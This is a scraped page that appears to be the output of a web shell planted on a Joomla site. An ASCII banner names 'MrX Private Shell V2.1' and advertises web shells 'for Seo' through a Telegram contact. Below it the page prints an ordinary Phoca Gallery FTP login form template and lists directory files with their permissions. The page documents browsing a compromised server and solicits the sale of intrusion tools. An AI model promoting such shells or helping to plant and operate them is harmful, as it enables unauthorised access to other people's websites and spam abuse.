__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Joomla.Administrator
* @subpackage com_templates
*
* @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
defined('_JEXEC') or die;
use Joomla\CMS\Language\Text;
?>
<fieldset class="adminform" title="<?php echo Text::_('COM_PHOCAGALLERY_FTP_TITLE'); ?>">
<legend><?php echo Text::_('COM_PHOCAGALLERY_FTP_TITLE'); ?></legend>
<?php echo Text::_('COM_PHOCAGALLERY_FTP_DESC'); ?>
<?php if ($this->t['ftp'] instanceof Exception): ?>
<p class="error"><?php echo Text::_($this->t['ftp']->message); ?></p>
<?php endif; ?>
<table class="adminform">
<tbody>
<tr>
<td width="120">
<label for="username"><?php echo Text::_('JGLOBAL_USERNAME'); ?></label>
</td>
<td>
<input type="text" id="username" name="username" class="form-control" size="70" value="" />
</td>
</tr>
<tr>
<td width="120">
<label for="password"><?php echo Text::_('JGLOBAL_PASSWORD'); ?></label>
</td>
<td>
<input type="password" id="password" name="password" class="form-control" size="70" value="" />
</td>
</tr>
</tbody>
</table>
</fieldset>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| edit.php | File | 2.63 KB | 0664 |
|
| edit_ftp.php | File | 1.2 KB | 0664 |
|
| index.html | File | 44 B | 0664 |
|